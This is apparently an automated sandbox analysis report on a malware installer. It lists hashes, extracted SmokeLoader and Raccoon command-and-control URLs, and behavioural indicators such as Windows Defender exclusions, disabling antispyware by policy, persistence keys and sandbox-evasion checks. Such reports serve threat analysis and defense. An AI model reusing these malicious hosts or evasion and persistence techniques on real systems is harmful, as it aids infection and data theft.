Overview
overview
10Static
static
ﱞﱞﱞ�...ﱞﱞ
windows10_x64
8ﱞﱞﱞ�...ฺฺ
windows10_x64
10ﱞﱞﱞ�...ﱞﱞ
windows10_x64
10ﱞﱞﱞ�...ﱞﱞ
windows10_x64
10ﱞﱞﱞ�...ﱞﱞ
windows7_x64
win102
windows10_x64
win104
windows10_x64
win105
windows10_x64
10win106
windows10_x64
win103
windows10_x64
10win101
windows10_x64
10win100
windows10_x64
10Resubmissions
24-04-2021 06:39
210424-lmjja25q22 1023-04-2021 19:10
210423-f6mvfx4yyx 1023-04-2021 19:10
210423-3qnl3etjca 1023-04-2021 18:20
210423-4keqsccdba 1023-04-2021 13:38
210423-1f2d5v8a2s 1023-04-2021 04:53
210423-eenyvz5kqj 1023-04-2021 04:53
210423-svr8rrwggs 1023-04-2021 04:53
210423-95h13plc2x 1022-04-2021 19:11
210422-6s1zd291s6 1022-04-2021 19:05
210422-dsvj9bzkvn 10Analysis
-
max time kernel
1802s -
max time network
1799s -
platform
windows10_x64 -
resource
win10v20210410 -
submitted
23-04-2021 04:53
Static task
static1
Behavioral task
behavioral1
Sample
Install.exe
Resource
win10v20210408
Behavioral task
behavioral2
Sample
Install.exe
Resource
win10v20210410
Behavioral task
behavioral3
Sample
Install.exe
Resource
win10v20210408
Behavioral task
behavioral4
Sample
Install.exe
Resource
win10v20210410
Behavioral task
behavioral5
Sample
Install.exe
Resource
win7v20210408
Behavioral task
behavioral6
Sample
Install.exe
Resource
win10v20210410
Behavioral task
behavioral7
Sample
Install.exe
Resource
win10v20210410
Behavioral task
behavioral8
Sample
Install.exe
Resource
win10v20210408
Behavioral task
behavioral9
Sample
Install.exe
Resource
win10v20210410
Behavioral task
behavioral10
Sample
Install.exe
Resource
win10v20210408
Behavioral task
behavioral11
Sample
Install.exe
Resource
win10v20210410
Behavioral task
behavioral12
Sample
Install.exe
Resource
win10v20210410
General
-
Target
Install.exe
-
Size
497KB
-
MD5
41a5f4fd1ea7cac4aa94a87aebccfef0
-
SHA1
0d0abf079413a4c773754bf4fda338dc5b9a8ddc
-
SHA256
97e95e99fd499ec45a7c1d8683d5731ce5e7a8fb8b710622e578cd169a00d8d9
-
SHA512
5ca14bda498f26efff4e1179969b8f2c25244063c7bf25f3ec20b5cd24b5be320bbfb8b3d0b2d66f5c5b415da777a766fece5f251a4247773c6cb991417fb75f
Malware Config
Extracted
smokeloader
2020
http://999080321newfolder1002002131-service1002.space/
http://999080321newfolder1002002231-service1002.space/
http://999080321newfolder3100231-service1002.space/
http://999080321newfolder1002002431-service1002.space/
http://999080321newfolder1002002531-service1002.space/
http://999080321newfolder33417-012425999080321.space/
http://999080321test125831-service10020125999080321.space/
http://999080321test136831-service10020125999080321.space/
http://999080321test147831-service10020125999080321.space/
http://999080321test146831-service10020125999080321.space/
http://999080321test134831-service10020125999080321.space/
http://999080321est213531-service1002012425999080321.ru/
http://999080321yes1t3481-service10020125999080321.ru/
http://999080321test13561-service10020125999080321.su/
http://999080321test14781-service10020125999080321.info/
http://999080321test13461-service10020125999080321.net/
http://999080321test15671-service10020125999080321.tech/
http://999080321test12671-service10020125999080321.online/
http://999080321utest1341-service10020125999080321.ru/
http://999080321uest71-service100201dom25999080321.ru/
http://999080321test61-service10020125999080321.website/
http://999080321test51-service10020125999080321.xyz/
http://999080321test41-service100201pro25999080321.ru/
http://999080321yest31-service100201rus25999080321.ru/
http://999080321rest21-service10020125999080321.eu/
http://999080321test11-service10020125999080321.press/
http://999080321newfolder4561-service10020125999080321.ru/
http://999080321rustest213-service10020125999080321.ru/
http://999080321test281-service10020125999080321.ru/
http://999080321test261-service10020125999080321.space/
http://999080321yomtest251-service10020125999080321.ru/
http://999080321yirtest231-service10020125999080321.ru/
http://al-commandoz.com/upload/
http://antalya-belek.com/upload/
http://luxurysv.com/upload/
http://massagespijkenisse.com/upload/
http://rexgorellhondaevent.com/upload/
Extracted
raccoon
9afb493c6f82d08075dbbfa7d93ce97f1dbf4733
-
url4cnc
https://tttttt.me/antitantief3
Signatures
-
SmokeLoader
Modular backdoor trojan in use since 2014.
-
resource yara_rule behavioral11/memory/5292-310-0x0000000010000000-0x0000000010116000-memory.dmp Telegram_rat -
WarzoneRat, AveMaria
WarzoneRat is a native RAT developed in C++ with multiple plugins sold as a MaaS.
-
Checks for common network interception software 1 TTPs
Looks in the registry for tools like Wireshark or Fiddler commonly used to analyze network activity.
-
Nirsoft 2 IoCs
resource yara_rule behavioral11/files/0x000200000001ad07-314.dat Nirsoft behavioral11/files/0x000200000001ad07-315.dat Nirsoft -
Downloads MZ/PE file
-
Drops file in Drivers directory 1 IoCs
description ioc Process File opened for modification C:\Windows\system32\drivers\etc\hosts Ultra.exe -
Executes dropped EXE 37 IoCs
pid Process 3868 Install.tmp 2812 Ultra.exe 3848 ultramediaburner.exe 1684 ultramediaburner.tmp 3952 Lusonamana.exe 1296 Mekicaeshaebae.exe 2496 UltraMediaBurner.exe 4764 instEU.exe 4440 google-game.exe 1284 md1_1eaf.exe 388 ATNQTNNRIP.exe 5460 y1.exe 5448 main.exe 5648 toolspab1.exe 5932 toolspab1.exe 6080 SunLabsPlayer.exe 4900 cmd.exe 4644 parse.exe 5292 mBDd5Qz6Fz.exe 4180 1619153555755.exe 4768 parse.exe 4644 parse.exe 1740 parse.exe 1140 686A.exe 6008 724F.exe 4968 data_load.exe 5024 data_load.exe 4248 lighteningplayer-cache-gen.exe 5896 hjsscbj 4688 essscbj 5168 hjsscbj 5344 essscbj 4928 hjsscbj 5712 hjsscbj 5880 essscbj 6128 hjsscbj 4972 hjsscbj -
Checks computer location settings 2 TTPs 1 IoCs
Looks up country code configured in the registry, likely geofence.
description ioc Process Key value queried \REGISTRY\USER\S-1-5-21-3686645723-710336880-414668232-1000\Control Panel\International\Geo\Nation Lusonamana.exe -
Drops startup file 2 IoCs
description ioc Process File created C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\programs.bat 686A.exe File created C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\programs.bat:start 686A.exe -
Loads dropped DLL 64 IoCs
pid Process 3868 Install.tmp 4660 rundll32.exe 5448 main.exe 5932 toolspab1.exe 6080 SunLabsPlayer.exe 4644 parse.exe 5460 y1.exe 6080 SunLabsPlayer.exe 6080 SunLabsPlayer.exe 6080 SunLabsPlayer.exe 6080 SunLabsPlayer.exe 6080 SunLabsPlayer.exe 6080 SunLabsPlayer.exe 6080 SunLabsPlayer.exe 6080 SunLabsPlayer.exe 6080 SunLabsPlayer.exe 1140 686A.exe 1140 686A.exe 1140 686A.exe 1140 686A.exe 1140 686A.exe 1140 686A.exe 6080 SunLabsPlayer.exe 6080 SunLabsPlayer.exe 6080 SunLabsPlayer.exe 6080 SunLabsPlayer.exe 6080 SunLabsPlayer.exe 6080 SunLabsPlayer.exe 6080 SunLabsPlayer.exe 6080 SunLabsPlayer.exe 5636 rundll32.exe 4344 rundll32.exe 6080 SunLabsPlayer.exe 6080 SunLabsPlayer.exe 6080 SunLabsPlayer.exe 6080 SunLabsPlayer.exe 6080 SunLabsPlayer.exe 6080 SunLabsPlayer.exe 6080 SunLabsPlayer.exe 4248 lighteningplayer-cache-gen.exe 4248 lighteningplayer-cache-gen.exe 4248 lighteningplayer-cache-gen.exe 4248 lighteningplayer-cache-gen.exe 4248 lighteningplayer-cache-gen.exe 4248 lighteningplayer-cache-gen.exe 4248 lighteningplayer-cache-gen.exe 4248 lighteningplayer-cache-gen.exe 4248 lighteningplayer-cache-gen.exe 4248 lighteningplayer-cache-gen.exe 4248 lighteningplayer-cache-gen.exe 4248 lighteningplayer-cache-gen.exe 4248 lighteningplayer-cache-gen.exe 4248 lighteningplayer-cache-gen.exe 4248 lighteningplayer-cache-gen.exe 4248 lighteningplayer-cache-gen.exe 4248 lighteningplayer-cache-gen.exe 4248 lighteningplayer-cache-gen.exe 4248 lighteningplayer-cache-gen.exe 4248 lighteningplayer-cache-gen.exe 4248 lighteningplayer-cache-gen.exe 4248 lighteningplayer-cache-gen.exe 4248 lighteningplayer-cache-gen.exe 4248 lighteningplayer-cache-gen.exe 4248 lighteningplayer-cache-gen.exe -
Reads user/profile data of web browsers 2 TTPs
Infostealers often target stored browser data, which can include saved credentials etc.
-
description ioc Process Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths\C:\Program Files (x86)\NDiMKFpxJkgR = "0" rundll32.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths\C:\Windows\TEMP\ = "0" rundll32.exe -
Adds Run key to start application 2 TTPs 1 IoCs
description ioc Process Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\RunOnce\system recover = "\"C:\\Program Files (x86)\\MSBuild\\Laelubaesaepy.exe\"" svchost.exe -
Checks for any installed AV software in registry 1 TTPs 1 IoCs
description ioc Process Key opened \REGISTRY\USER\S-1-5-21-3686645723-710336880-414668232-1000\SOFTWARE\KasperskyLab powershell.exe -
Checks installed software on the system 1 TTPs
Looks up Uninstall key entries in the registry to enumerate software on the system.
-
description ioc Process Key value queried \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA md1_1eaf.exe -
Legitimate hosting services abused for malware hosting/C2 1 TTPs
-
Looks up external IP address via web service 2 IoCs
Uses a legitimate IP lookup service to find the infected system's external IP.
flow ioc 89 ip-api.com 125 api.myip.com -
Drops file in System32 directory 14 IoCs
description ioc Process File created C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\Windows\INetCookies\M0Y92IU9.cookie svchost.exe File opened for modification C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\Windows\INetCookies\M0Y92IU9.cookie svchost.exe File opened for modification C:\Windows\System32\Tasks\Firefox Default Browser Agent 46CBE1CCD988F96D svchost.exe File opened for modification C:\Windows\System32\Tasks\NDiMKFpxJkgR svchost.exe File opened for modification C:\Windows\System32\GroupPolicy\gpt.ini rundll32.exe File opened for modification C:\Windows\System32\GroupPolicy rundll32.exe File created C:\Windows\System32\GroupPolicy\Machine\Registry.pol rundll32.exe File opened for modification C:\Windows\System32\GroupPolicy\GPT.INI rundll32.exe File opened for modification C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\Windows\INetCache\counters2.dat svchost.exe File opened for modification C:\Windows\System32\Tasks\Firefox Default Browser Agent 116D993B53F84AD0 svchost.exe File opened for modification C:\Windows\System32\GroupPolicy rundll32.exe File opened for modification C:\Windows\System32\GroupPolicy\gpt.ini rundll32.exe File opened for modification C:\Windows\System32\GroupPolicy\GPT.INI rundll32.exe File opened for modification C:\Windows\System32\GroupPolicy\Machine\Registry.pol rundll32.exe -
Suspicious use of NtSetInformationThreadHideFromDebugger 19 IoCs
pid Process 5448 main.exe 5448 main.exe 5448 main.exe 5448 main.exe 5448 main.exe 5448 main.exe 5448 main.exe 5448 main.exe 5448 main.exe 5448 main.exe 4644 parse.exe 4768 parse.exe 1740 parse.exe 4644 parse.exe 4768 parse.exe 1740 parse.exe 4644 parse.exe 4768 parse.exe 1740 parse.exe -
Suspicious use of SetThreadContext 5 IoCs
description pid Process procid_target PID 3212 set thread context of 2812 3212 svchost.exe 101 PID 5648 set thread context of 5932 5648 toolspab1.exe 124 PID 5896 set thread context of 5168 5896 hjsscbj 214 PID 4928 set thread context of 5712 4928 hjsscbj 223 PID 6128 set thread context of 4972 6128 hjsscbj 226 -
Drops file in Program Files directory 64 IoCs
description ioc Process File created C:\Program Files (x86)\lighteningplayer\lua\playlist\vocaroo.luac SunLabsPlayer.exe File created C:\Program Files (x86)\lighteningplayer\plugins\control\libhotkeys_plugin.dll SunLabsPlayer.exe File created C:\Program Files (x86)\lighteningplayer\plugins\demux\libpva_plugin.dll SunLabsPlayer.exe File created C:\Program Files (x86)\lighteningplayer\lua\http\dialogs\stream_config_window.html SunLabsPlayer.exe File created C:\Program Files (x86)\lighteningplayer\plugins\control\libdummy_plugin.dll SunLabsPlayer.exe File created C:\Program Files (x86)\lighteningplayer\plugins\logger\libfile_logger_plugin.dll SunLabsPlayer.exe File created C:\Program Files (x86)\lighteningplayer\plugins\access\libtimecode_plugin.dll SunLabsPlayer.exe File created C:\Program Files (x86)\lighteningplayer\plugins\control\libwin_hotkeys_plugin.dll SunLabsPlayer.exe File created C:\Program Files (x86)\lighteningplayer\plugins\misc\libgnutls_plugin.dll SunLabsPlayer.exe File created C:\Program Files (x86)\lighteningplayer\lua\http\mobile_view.html SunLabsPlayer.exe File created C:\Program Files (x86)\lighteningplayer\plugins\spu\libaudiobargraph_v_plugin.dll SunLabsPlayer.exe File created C:\Program Files (x86)\lighteningplayer\plugins\video_splitter\libpanoramix_plugin.dll SunLabsPlayer.exe File created C:\Program Files (x86)\UltraMediaBurner\unins000.dat ultramediaburner.tmp File created C:\Program Files (x86)\lighteningplayer\plugins\demux\libwav_plugin.dll SunLabsPlayer.exe File created C:\Program Files (x86)\lighteningplayer\plugins\gui\libqt_plugin.dll SunLabsPlayer.exe File created C:\Program Files (x86)\lighteningplayer\plugins\meta_engine\libtaglib_plugin.dll SunLabsPlayer.exe File opened for modification C:\Program Files (x86)\UltraMediaBurner\UltraMediaBurner.exe ultramediaburner.tmp File created C:\Program Files (x86)\lighteningplayer\lua\http\requests\vlm.xml SunLabsPlayer.exe File created C:\Program Files (x86)\lighteningplayer\lua\playlist\jamendo.luac SunLabsPlayer.exe File created C:\Program Files (x86)\lighteningplayer\plugins\control\libwin_msg_plugin.dll SunLabsPlayer.exe File created C:\Program Files (x86)\lighteningplayer\lua\http\js\common.js SunLabsPlayer.exe File created C:\Program Files (x86)\lighteningplayer\lua\http\css\ui-lightness\images\ui-bg_flat_10_000000_40x100.png SunLabsPlayer.exe File created C:\Program Files (x86)\lighteningplayer\lua\http\css\ui-lightness\images\ui-bg_gloss-wave_35_f6a828_500x100.png SunLabsPlayer.exe File created C:\Program Files (x86)\lighteningplayer\lua\http\css\ui-lightness\images\ui-icons_228ef1_256x240.png SunLabsPlayer.exe File created C:\Program Files (x86)\lighteningplayer\lua\http\images\vlc-48.png SunLabsPlayer.exe File created C:\Program Files (x86)\lighteningplayer\plugins\audio_output\libwaveout_plugin.dll SunLabsPlayer.exe File created C:\Program Files (x86)\lighteningplayer\plugins\demux\libps_plugin.dll SunLabsPlayer.exe File created C:\Program Files (x86)\lighteningplayer\plugins\misc\libstats_plugin.dll SunLabsPlayer.exe File created C:\Program Files (x86)\UltraMediaBurner\is-EO449.tmp ultramediaburner.tmp File opened for modification C:\Program Files\temp_files\ SunLabsPlayer.exe File created C:\Program Files (x86)\lighteningplayer\lua\playlist\koreus.luac SunLabsPlayer.exe File created C:\Program Files (x86)\lighteningplayer\plugins\demux\libflacsys_plugin.dll SunLabsPlayer.exe File created C:\Program Files (x86)\lighteningplayer\lua\http\dialogs\browse_window.html SunLabsPlayer.exe File created C:\Program Files (x86)\lighteningplayer\lua\http\images\speaker-32.png SunLabsPlayer.exe File created C:\Program Files (x86)\lighteningplayer\lua\http\js\ui.js SunLabsPlayer.exe File created C:\Program Files (x86)\lighteningplayer\lua\meta\art\01_googleimage.luac SunLabsPlayer.exe File created C:\Program Files (x86)\lighteningplayer\plugins\demux\libsmf_plugin.dll SunLabsPlayer.exe File created C:\Program Files (x86)\lighteningplayer\lighteningplayer-cache-gen.exe SunLabsPlayer.exe File created C:\Program Files (x86)\lighteningplayer\libvlccore.dll SunLabsPlayer.exe File created C:\Program Files (x86)\lighteningplayer\lua\http\css\ui-lightness\images\ui-icons_ffffff_256x240.png SunLabsPlayer.exe File created C:\Program Files (x86)\lighteningplayer\lua\modules\sandbox.luac SunLabsPlayer.exe File created C:\Program Files (x86)\lighteningplayer\plugins\demux\libnuv_plugin.dll SunLabsPlayer.exe File created C:\Program Files (x86)\lighteningplayer\lua\http\view.html SunLabsPlayer.exe File created C:\Program Files (x86)\lighteningplayer\lua\http\custom.lua SunLabsPlayer.exe File created C:\Program Files (x86)\lighteningplayer\lua\http\css\ui-lightness\images\ui-bg_highlight-soft_100_eeeeee_1x100.png SunLabsPlayer.exe File created C:\Program Files (x86)\lighteningplayer\lua\http\requests\status.xml SunLabsPlayer.exe File created C:\Program Files (x86)\lighteningplayer\lua\intf\dumpmeta.luac SunLabsPlayer.exe File created C:\Program Files (x86)\lighteningplayer\lua\modules\common.luac SunLabsPlayer.exe File created C:\Program Files (x86)\lighteningplayer\plugins\access\libsmb_plugin.dll SunLabsPlayer.exe File created C:\Program Files (x86)\lighteningplayer\plugins\packetizer\libpacketizer_mpegvideo_plugin.dll SunLabsPlayer.exe File created C:\Program Files (x86)\lighteningplayer\libvlc.dll SunLabsPlayer.exe File created C:\Program Files (x86)\lighteningplayer\lua\http\css\ui-lightness\images\ui-icons_222222_256x240.png SunLabsPlayer.exe File opened for modification C:\Program Files\temp_files\cache.dat data_load.exe File created C:\Program Files (x86)\MSBuild\Laelubaesaepy.exe svchost.exe File created C:\Program Files (x86)\lighteningplayer\lua\http\favicon.ico SunLabsPlayer.exe File created C:\Program Files (x86)\lighteningplayer\plugins\packetizer\libpacketizer_mpeg4audio_plugin.dll SunLabsPlayer.exe File created C:\Program Files (x86)\MSBuild\Laelubaesaepy.exe.config svchost.exe File created C:\Program Files (x86)\lighteningplayer\lua\intf\telnet.luac SunLabsPlayer.exe File created C:\Program Files (x86)\lighteningplayer\plugins\access\libaccess_mms_plugin.dll SunLabsPlayer.exe File created C:\Program Files (x86)\lighteningplayer\plugins\access\libimem_plugin.dll SunLabsPlayer.exe File created C:\Program Files (x86)\lighteningplayer\plugins\control\liboldrc_plugin.dll SunLabsPlayer.exe File created C:\Program Files (x86)\lighteningplayer\plugins\demux\libxa_plugin.dll SunLabsPlayer.exe File created C:\Program Files (x86)\lighteningplayer\plugins\packetizer\libpacketizer_mlp_plugin.dll SunLabsPlayer.exe File created C:\Program Files (x86)\lighteningplayer\plugins\text_renderer\libtdummy_plugin.dll SunLabsPlayer.exe -
Drops file in Windows directory 2 IoCs
description ioc Process File opened for modification C:\Windows\Debug\ESE.TXT MicrosoftEdge.exe File opened for modification C:\Windows\Debug\ESE.TXT MicrosoftEdge.exe -
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.
-
NSIS installer 2 IoCs
resource yara_rule behavioral11/files/0x000100000001abe0-266.dat nsis_installer_2 behavioral11/files/0x000100000001abe0-265.dat nsis_installer_2 -
Checks SCSI registry key(s) 3 TTPs 24 IoCs
SCSI information is often read in order to detect sandboxing environments.
description ioc Process Key queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI hjsscbj Key enumerated \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI hjsscbj Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI hjsscbj Key queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI essscbj Key enumerated \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI essscbj Key enumerated \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI parse.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI essscbj Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI hjsscbj Key queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI parse.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI essscbj Key queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI toolspab1.exe Key enumerated \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI toolspab1.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI parse.exe Key queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI essscbj Key queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI hjsscbj Key enumerated \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI hjsscbj Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI essscbj Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI toolspab1.exe Key queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI hjsscbj Key enumerated \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI hjsscbj Key enumerated \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI essscbj Key queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI essscbj Key enumerated \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI essscbj Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI hjsscbj -
Checks processor information in registry 2 TTPs 2 IoCs
Processor information is often read in order to detect sandboxing environments.
description ioc Process Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0 svchost.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~MHz svchost.exe -
Delays execution with timeout.exe 1 IoCs
pid Process 6008 timeout.exe -
Download via BitsAdmin 1 TTPs 1 IoCs
pid Process 5388 bitsadmin.exe -
description ioc Process Key created \REGISTRY\USER\S-1-5-21-3686645723-710336880-414668232-1000\Software\Microsoft\Internet Explorer\Main MicrosoftEdge.exe Key created \REGISTRY\USER\S-1-5-21-3686645723-710336880-414668232-1000\Software\Microsoft\Internet Explorer\Main browser_broker.exe Key created \REGISTRY\USER\S-1-5-21-3686645723-710336880-414668232-1000\Software\Microsoft\Internet Explorer\Main MicrosoftEdgeCP.exe Key created \REGISTRY\USER\S-1-5-21-3686645723-710336880-414668232-1000\Software\Microsoft\Internet Explorer\Main browser_broker.exe -
Modifies data under HKEY_USERS 33 IoCs
description ioc Process Set value (int) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\ProxyBypass = "1" svchost.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\5.0\Cache\History\CachePrefix = "Visited:" svchost.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows rundll32.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Group Policy Objects\{BBFE0E21-9603-4C44-8CD5-26EE4A9A711F}Machine rundll32.exe Key deleted \REGISTRY\USER\.DEFAULT\SOFTWARE\MICROSOFT\WINDOWS\CURRENTVERSION\GROUP POLICY OBJECTS\{BBFE0E21-9603-4C44-8CD5-26EE4A9A711F}USER rundll32.exe Key deleted \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Group Policy Objects\{BBFE0E21-9603-4C44-8CD5-26EE4A9A711F}Machine\SOFTWARE rundll32.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\ActiveMovie svchost.exe Set value (int) \REGISTRY\USER\.DEFAULT\Software\Microsoft\ActiveMovie\devenum 64-bit\Version = "7" svchost.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\5.0\Cache\Content\CachePrefix svchost.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\5.0\Cache\Cookies\CachePrefix = "Cookie:" svchost.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Group Policy Objects\{BBFE0E21-9603-4C44-8CD5-26EE4A9A711F}Machine\SOFTWARE\Policies rundll32.exe Set value (int) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Group Policy Objects\{BBFE0E21-9603-4C44-8CD5-26EE4A9A711F}Machine\SOFTWARE\Policies\Microsoft\Windows Defender\DisableAntiSpyware = "1" rundll32.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft rundll32.exe Set value (int) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\UNCAsIntranet = "1" svchost.exe Key deleted \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Group Policy Objects rundll32.exe Key deleted \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Group Policy Objects\{BBFE0E21-9603-4C44-8CD5-26EE4A9A711F}Machine\SOFTWARE\Policies\Microsoft rundll32.exe Key created \REGISTRY\USER\.DEFAULT\Software svchost.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Group Policy Objects\{BBFE0E21-9603-4C44-8CD5-26EE4A9A711F}Machine\SOFTWARE rundll32.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Group Policy Objects\{BBFE0E21-9603-4C44-8CD5-26EE4A9A711F}Machine\SOFTWARE\Policies\Microsoft rundll32.exe Key deleted \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Group Policy Objects\{BBFE0E21-9603-4C44-8CD5-26EE4A9A711F}Machine\SOFTWARE\Policies\Microsoft\Windows Defender rundll32.exe Key created \REGISTRY\USER\.DEFAULT\Software rundll32.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Group Policy Objects rundll32.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Group Policy Objects\{BBFE0E21-9603-4C44-8CD5-26EE4A9A711F}Machine\SOFTWARE\Policies\Microsoft\Windows Defender rundll32.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\ActiveMovie\devenum 64-bit svchost.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft svchost.exe Set value (int) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\IntranetName = "1" svchost.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Group Policy Objects\{BBFE0E21-9603-4C44-8CD5-26EE4A9A711F}User rundll32.exe Key deleted \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Group Policy Objects\{BBFE0E21-9603-4C44-8CD5-26EE4A9A711F}Machine rundll32.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\ svchost.exe Set value (int) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\AutoDetect = "0" svchost.exe Set value (data) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\16\52C64B7E\LanguageList = 65006e002d0055005300000065006e0000000000 rundll32.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion rundll32.exe Key deleted \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Group Policy Objects\{BBFE0E21-9603-4C44-8CD5-26EE4A9A711F}Machine\SOFTWARE\Policies rundll32.exe -
Modifies registry class 64 IoCs
description ioc Process Set value (int) \REGISTRY\USER\S-1-5-21-3686645723-710336880-414668232-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\BrowserEmulation\CVListXMLVersionHigh = "0" MicrosoftEdge.exe Set value (int) \REGISTRY\USER\S-1-5-21-3686645723-710336880-414668232-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Children\001\Internet Settings\Cache\History\CacheLimit = "1" MicrosoftEdgeCP.exe Key created \REGISTRY\USER\S-1-5-21-3686645723-710336880-414668232-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Children\001\Internet Explorer MicrosoftEdgeCP.exe Set value (int) \REGISTRY\USER\S-1-5-21-3686645723-710336880-414668232-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\DummyPath\dummySetting = "1" MicrosoftEdge.exe Set value (data) \REGISTRY\USER\S-1-5-21-3686645723-710336880-414668232-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\Protected - It is a violation of Windows Policy to modify. = 010000003762e74e1f142cb0715a54e1887368d32f64359f43dea27dfc8b0d65c82e240e5f428cfea413400ddf7b901868f781feb88013e63d6d3a04d6f9 MicrosoftEdge.exe Set value (int) \REGISTRY\USER\S-1-5-21-3686645723-710336880-414668232-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\BrowserEmulation\CVListXMLVersionHigh = "268435456" MicrosoftEdge.exe Set value (int) \REGISTRY\USER\S-1-5-21-3686645723-710336880-414668232-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Internet Settings\Cache\History\CacheLimit = "1" MicrosoftEdge.exe Set value (int) \REGISTRY\USER\S-1-5-21-3686645723-710336880-414668232-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\BrowserEmulation\CVListXMLVersionLow = "0" MicrosoftEdge.exe Key created \REGISTRY\USER\S-1-5-21-3686645723-710336880-414668232-1000_Classes\Local 